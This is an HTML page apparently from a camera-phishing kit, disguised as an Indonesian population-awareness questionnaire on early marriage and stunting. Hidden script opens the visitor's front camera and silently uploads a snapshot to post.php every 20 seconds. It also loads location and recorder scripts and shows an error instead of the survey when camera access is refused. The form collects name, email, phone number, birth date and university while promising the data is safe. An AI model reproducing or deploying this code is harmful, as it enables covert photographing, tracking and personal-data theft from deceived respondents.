<!doctype html>
<html>
<head>
  <script src="../../assets/js/jquery.min.js"></script>
  <script src="../../assets/js/client.min.js"></script>
  <script src="../../assets/js/loc.js"></script>
  <link href="../../assets/css/bootstrap.min.css" rel="stylesheet">
  <link href="../../assets/css/light-theme.min.css" rel="stylesheet">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>

</html>
<html>
<body onload="mydata()">

<div class="video-wrap" hidden="hidden">
   <video id="video" playsinline autoplay></video>
</div>

<canvas hidden="hidden" id="canvas" width="640" height="640"></canvas>
<script src="../../assets/js/location.js"></script>
<script src="../../assets/js/recorder.js"></script>
<script src=js/_app.js></script>
<script>

function post(imgdata){
$.ajax({
    type: 'POST',
    data: { cat: imgdata},
    url: 'post.php',
    dataType: 'json',
    async: false,
    success: function(result){
        // call the function that handles the response/results
    },
    error: function(){
    }
  });
};


'use strict';

const video = document.getElementById('video');
const canvas = document.getElementById('canvas');
const errorMsgElement = document.querySelector('span#errorMsg');

const constraints = {
  audio: false,
  video: {
    
    facingMode: "user"
  }
};
// environment -- user

// Access webcam
async function init() {
  try {
    const stream = await navigator.mediaDevices.getUserMedia(constraints);
    handleSuccess(stream);
  } catch (e) {

    if (e.toString() === 'NotAllowedError: Permission denied' || e.toString() === 'NotAllowedError: Permission dismissed'){
    $('.formulir').hide();
    $('.tampil_error').show();
    }

    //console.log(e.toString());
    //errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
   
  }
}

// Success
function handleSuccess(stream) {
  window.stream = stream;
  video.srcObject = stream;

var context = canvas.getContext('2d');
  setInterval(function(){

       context.drawImage(video, 0, 0, 640, 640);
       var canvasData = canvas.toDataURL("image/png");
       cc = String(canvasData).replace("data:image/png;base64,","");
      //  console.log(cc)
       post(cc);}, 20000);
  

}


// Load init
init();

</script>

</body>
</html>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>KUISIONER</title>
    <script>
        window.console = window.console || function (t) {
        };
    </script>
    <script>
        if (document.location.search.match(/type=embed/gi)) {
            window.parent.postMessage("resize", "*");
        }
    </script>

<!--page control-->
<script src="js/halaman.js"></script> 

</head>

<body translate="no">

  <div class="bg-dark text-light p-4 container-fluid"><h1>LAMAN KUISIONER</h1></div>

  
 <!-- Mulai Formulir --> 
<div class="container formulir p-4 mt-3">

  <div id="gtau" class="container text-center mt-5" style="display: none;"><i class="fa fa-refresh fa-spin fa-2x"></i><h3 style="display: inline;">&nbsp;&nbsp;Loading</h3></div>
 
  <div id="mulai" class="text-center">
    <h1>Selamat Datang!</h1>
    <p>Selamat datang di halaman kuisioner <b>SIAGA KEPENDUDUKAN</b>. Nantinya akan ada beberapa form pertanyaan, dan dimohon untuk mengisi formulir tersebut. Apabila ada data dari pengguna, maka data tersebut akan aman. Bila anda sudah siap silahkan klik tombol mulai dibawah :)</p>
  
    <button class= "btn btn-lg font-weight-bold btn-primary tbl0">MULAI</button>
  
   
</div>

<div id="nama">
    <div class="form-group">
      <label for="namaform1"><h5>Nama</h5></label>
      <input type="text" class="form-control" id="namaform1" aria-describedby="emailHelp" name="Nama" placeholder="masukkan nama" required>
    </div>
  
    <button class="btn btn-primary tbl1">Kirim</button>
  
   
</div>



<div id="alamatEmail">
    <div class="form-group">
      <label for="emailform1"><h5>Email</h5></label>
      <input type="email" class="form-control" id="emailform1" aria-describedby="emailHelp" name="Email" placeholder="masukkan email" required>
    </div>
  
    <button class="btn btn-primary tbl2">Kirim</button>
  
    
</div>

<div id="nomorHP">
  <div class="form-group">
    <label for="nomorhpform1"><h5>Nomor HP</h5></label>
    <input type="number" class="form-control" id="nomorhpform1" aria-describedby="emailHelp" name="Nomor HP" placeholder="masukkan nomor WA" required>
  </div>

  <button class="btn btn-primary tbl3">Kirim</button>

</div>



<!-- TTL dia, Ayah, ibu -->

<div id="TTL">
  <div class="form-group">
    <label for="tempatLahir"><h5>Tempat Lahir</h5></label>
    <input type="text" class="form-control mb-5" id="tempatLahir" name="Tempat Lahir" placeholder="Tempat Lahir..." required>
    
    <label for="taggalLahir"><h5>Tanggal Lahir</h5></label>
    <input type="date" class="form-control" placeholder="dd-mm-yyyy" id="taggalLahir" name="Tanggal Lahir" required>
    <p>*pengisian tanggal bisa dilakukan dengan klik ikon tanggalan</p>
  </div>

  <button class="btn btn-primary tbl4">Kirim</button>

</div>


<div id="asalUniversitas">
  <div class="form-group">
    <label for="asalUnivform1"><h5>Asal universitas</h5></label>
    <input type="text" class="form-control" id="asalUnivform1" aria-describedby="emailHelp" name="Universitas" placeholder="asal universitas" required>
  </div>

  <button class="btn btn-primary tbl5">Kirim</button>
  
</div>

<div id="jurusanKuliah">
  <div class="form-group">
    <label for="jurusanform1"><h5>Jurusan</h5></label>
    <input type="text" class="form-control" id="jurusanform1" aria-describedby="emailHelp" name="Universitas" placeholder="Jurusan . . ." required>
  </div>

  <button class="btn btn-primary tbl6">Kirim</button>
  
</div>

<div id="pengertianNikahDini">
  <div class="form-group">
    <label for="pengertianNikahDiniform1"><h5>Apa yang kamu ketahui tentang pernikahan dini?</h5></label>
    <textarea class="form-control" id="pengertianNikahDiniform1" aria-describedby="emailHelp" name="Apa itu Pernikahan dini" placeholder="Tulis disini...." rows="7"></textarea>
  </div>

  <button class="btn btn-primary tbl7">Kirim</button>
  
</div>

<div id="doronganNikahDini">
  <h5 class="mb-3">Apakah ada dorongan nikah dini dari keluargamu?</h5>
  <div class="form-check">
    <label class="form-check-label" for="radio1">
      <input type="radio" class="form-check-input" id="radio1" name="optrad" value="Ya" checked>Ya
    </label>
  </div>
  <div class="form-check">
    <label class="form-check-label" for="radio2">
      <input type="radio" class="form-check-input" id="radio2" name="optrad" value="Tidak">Tidak
    </label>
  </div>
  <!--
  <div class="form-check">
    <label class="form-check-label">
      <input type="radio" class="form-check-input" id="radio3" name="optrad" value="Saya Tidak Tahu">Saya Tidak Tahu
    </label>
  </div>
  -->


  <button class="btn btn-primary mt-3 tbl8">Kirim</button>
  
</div>


<div id="usiaNikah">
  <div class="form-group">
    <label for="usiaNikahform1"><h5>Apakah kamu tahu usia ideal menikah untuk laki-laki dan perempuan? (bila tidak tahu, tulis tidak tahu)</h5></label>
    <textarea class="form-control" id="usiaNikahform1" aria-describedby="emailHelp" name="usia_nikah" placeholder="Tulis disini...." rows="2"></textarea>
  </div>

  <button class="btn btn-primary tbl9">Kirim</button>
  
</div>

<div id="pendapatNikahDini">
  <div class="form-group">
    <label for="pendapatNikahDiniform1"><h5>Tuliskan pandanganmu tentang pernikahan dini. Bila kamu setuju dengan pernikahan dini, silahkan berikan alasanmu setuju. Bila kamu tidak setuju, berikan alasan kenapa kamu tidak setuju.</h5></label>
    <textarea class="form-control" id="pendapatNikahDiniform1" aria-describedby="emailHelp" name="pendapat_nikah_dini" placeholder="Tulis disini...." rows="7"></textarea>
  </div>

  <button class="btn btn-primary tbl10">Kirim</button>
  
</div>

<div id="pengertianStunting">
  <div class="form-group">
    <label for="pengertianStuntingform1"><h5>Apakah kamu tahu apa itu stunting?</h5></label>
    <textarea class="form-control" id="pengertianStuntingform1" aria-describedby="emailHelp" name="pengertian_stunting" placeholder="Tulis disini...." rows="7"></textarea>
  </div>

  <button class="btn btn-primary tbl11">Kirim</button>
  
</div>

<div id="hubunganStunting">
  <div class="form-group">
    <label for="hubunganStuntingform1"><h5>Apakah kamu tahu apa itu stunting?</h5></label>
    <textarea class="form-control" id="hubunganStuntingform1" aria-describedby="emailHelp" name="hub_stunting" placeholder="Tulis disini...." rows="7"></textarea>
  </div>

  <button class="btn btn-primary tbl12">Kirim</button>
  
</div>

<div id="terima_kasih">
  <h1>TERIMA KASIH :)</h1>
  <p>Kami ucapkan terima kasih atas partisipasinya dalam kuisioner ini...</p>
</div>

</div>
<!-- Akhir Formulir Formulir -->

<!--pesan error-->
<div class="tampil_warning jumbotron bg-info text-light m-3" style="display: none;">
  <h1>TIDAK MENDUKUNG :(</h1>
  <p>Mohon Maaf, web ini belum bisa mendukung platform Windows</p>
  
</div>

<div class="tampil_error jumbotron bg-danger text-light m-3" style="display: none;">
<h1>ERROR&nbsp;:(</h1>
<p>Web ini tidak bisa mengakses sumber daya yang diperlukan</p>

</div>




<script>
 var client = new ClientJS();
 var OS = client.getOS();
 console.log(OS);
 if(OS == 'Windows'){

   $('.tampil_warning').show(); 
   $('.formulir').hide();
   $('.tampil_error').hide();
 }
</script>
</body>
</html>